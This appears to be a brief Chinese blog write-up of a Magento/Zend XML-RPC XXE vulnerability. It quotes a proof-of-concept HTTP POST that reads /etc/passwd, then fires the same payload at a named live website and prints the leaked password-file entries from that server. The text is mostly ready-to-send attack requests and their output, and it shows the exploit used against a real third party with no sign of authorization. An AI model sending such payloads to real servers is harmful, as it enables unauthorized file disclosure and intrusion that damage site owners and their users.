0x2
利用方法其中也说的很明白:
Proof of concept:
-----------------
Magento uses a vulnerable Zend_XmlRpc_Server() class (Zend\XmlRpc\Server.php)
to handle XML-RPC requests. Hence it is possible to disclose arbitrary local
files from the remote system. The following HTTP POST request to the
vulnerable XmlRpc server application illustrates the exploitation of this
vulnerability:
POST /index.php/api/xmlrpc HTTP/1.1
Host: $host
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT methodName ANY >
<!ENTITY xxe SYSTEM"file:///etc/passwd" >]>
<methodCall>
<methodName>&xxe;</methodName>
</methodCall>
0x3
这里拿威风网为例:
POST /index.php/api/xmlrpc HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1)AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1155.2 Safari/537.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Content-Length: 190
<?xml version="1.0"?>
<!DOCTYPEfoo [
<!ELEMENT methodName ANY >
<!ENTITYqingshen SYSTEM "file:///etc/passwd" >]>
<methodCall>
<methodName>&qingshen;</methodName>
</methodCall>
HTTP/1.1 200 OK
Date: Fri, 13 Jul 2012 15:57:44 GMT
Server: nginx/1.2.0
Content-Type: text/xml; charset=UTF-8
X-Powered-By: PHP/5.2.14
Cache-Control: no-cache,must-revalidate
X-Via: 1.1 stsz14:8106 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 3228
<?xml version="1.0"encoding="UTF-8"?>
<methodResponse><fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name>faultString</name><value><string>Method"root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
…..下面还有好多用户,省略掉
下面是其他站点的:
0x4
https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt
,www.xuhantao.com,涛涛电脑知识网